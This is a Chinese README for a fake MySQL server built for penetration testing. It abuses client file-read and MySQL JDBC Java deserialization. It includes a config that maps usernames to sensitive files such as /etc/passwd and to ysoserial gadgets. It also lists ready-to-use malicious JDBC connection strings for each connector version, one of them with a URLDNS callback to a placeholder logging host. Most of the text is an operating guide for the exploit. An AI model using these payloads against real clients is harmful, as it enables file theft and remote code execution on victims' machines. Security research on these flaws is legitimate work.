ENGLISH|简体中文
用于渗透测试过程中的假MySQL服务器,纯原生python3实现,不依赖其它包。
修改自项目https://github.com/waldiTM/python-mysqlproto
- MySQL服务端读取客户端文件漏洞利用
- MySQL JDBC客户端Java反序列化漏洞利用
- 需要python3环境,无任何其它依赖。
- 运行:
python server.py
- 需要ysoserial才能用反序列化功能,支持
ServerStatusDiffInterceptor
和detectCustomCollations
两种方式。 - MySQL的用户名支持冒号、斜杠等特殊符号,但是能否使用还需看具体客户端环境。
- 根据登录用户名返回文件读取利用报文、反序列化利用报文。
- **推荐用法:**config.json中预置了一部分配置信息,可以自己修改添加指定用户名对应的读取文件和yso参数,详细看下面的说明
- jdk1.8.20+mysql-connector-java 8.0.14/5.1.22(Windows下反序列化(JRE8u20)、文件读取)
- PHPMyAdmin(Windows+Linux文件读取,可以使用相对路径读取php文件内容)
- Navicat 12(Windows下文件读取,需要切换到mysql_clear_password认证插件)
默认的config.json:
{
//文件读取参数
"fileread":{
"win_ini":"c:\\windows\\win.ini",//key为设定的用户名,value为要读取的文件路径
"win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
"win":"c:\\windows\\",
"linux_passwd":"/etc/passwd",
"linux_hosts":"/etc/hosts",
"index_php":"index.php"
},
//ysoserial参数
"yso":{
"Jdk7u21":["Jdk7u21","calc"]//key为设定的用户名,value为ysoserial参数的参数
}
}
-
文件读取:
- 可以在config.json中fileread节中预定义好要读取的文件(比如win_ini用户名读取win.ini文件)
- 可以用fileread_开头的用户名(例如使用用户名fileread_/etc/passwd来读取/etc/passwd文件)
-
反序列化
-
可在config.json中yso节预定义好yso payload的生成参数(比如Jdk7u21用户名返回Jdk7u21执行计算器的gadget)
-
可以用yso_开头的用户名,格式yso_payload类型_命令(例如jdk7u21调用calc就使用用户名yso_Jdk7u21_calc)
jdbc连接串示例:
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_Jdk7u21_calc
jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_URLDNS_http://yourdns.log.addr/
-
-
关于认证:默认认证插件一般使用mysql_native_password,但是由于协议实现的问题,navicat下会连接失败,此时在使用的用户名后追加 _clear 即可切换为mysql_clear_password,navicat连接成功,读取到文件。
- 例如: fileread_/etc/passwd_clear
写分析的时候整理了一下:https://www.anquanke.com/post/id/203086 用户名请参考上面的说明进行修改。
-
8.x:
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
-
6.x(属性名不同):
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
-
5.1.11及以上的5.x版本(包名没有了cj):
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
-
5.1.10及以下的5.1.X版本: 同上,但是需要连接后执行查询。
-
5.0.x: 还没有
ServerStatusDiffInterceptor
这个东西┓( ´∀` )┏
-
5.1.41及以上: 不可用
-
5.1.29-5.1.40:
jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_JRE8u20_calc
-
5.1.28-5.1.19:
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&user=yso_JRE8u20_calc
-
5.1.18以下的5.1.x版本: 不可用
-
5.0.x版本不可用
Navicat文件读取(用户名使用win_ini_clear)
JDK 1.8.20+mysql-connector-java 8.0.14反序列化,使用用户名:yso_JRE8u20_calc
- SHOW VARIABLES 相关
- 会读取两列,所以需要返回两列,否则会报错。
- JDBC连接的时候回通过调用
SHOW VARIABLES
获取服务器变量,其中最重要的是两个时区变量system_time_zone
和time_zone
,在getObject过程,会调用到时区相关信息,没有这两个会直接报错
- jdbc的Blob判定条件除了字段类型为blob,还要求字段声明的org_table字段不为空,flags大于128,否则会被当做text进行解析。(com.mysql.cj.protocol.a.NativeProtocol的findMysqlType方法)
- 原python-mysqlproto中的序列检测需要去掉,否则会出错(这个应该是哪里处理有问题导致了序号重置)。
SHOW SESSION STATUS
和SHOW COLLATION
的公用列是第二列- mysql java connector 5.x的环境下,需要返回的server版本大于等于5.0.0才会走到
Util.resultSetToMap
进入getObject
360云安全团队目前大量招聘中,欢迎各位大佬投递简历,大家一起来愉快地玩耍~^_^
https://www.anquanke.com/post/id/200462
项目基础:
https://github.com/waldiTM/python-mysqlproto
漏洞相关:
https://paper.seebug.org/1112/
https://github.com/codeplutos/MySQL-JDBC-Deserialization-Payload
协议相关:
https://dev.mysql.com/doc/internals/en/protocoltext-resultset.html
https://dev.mysql.com/doc/internals/en/character-set.html
https://dev.mysql.com/doc/internals/en/com-query-response.html#packet-Protocol::LOCAL_INFILE_Data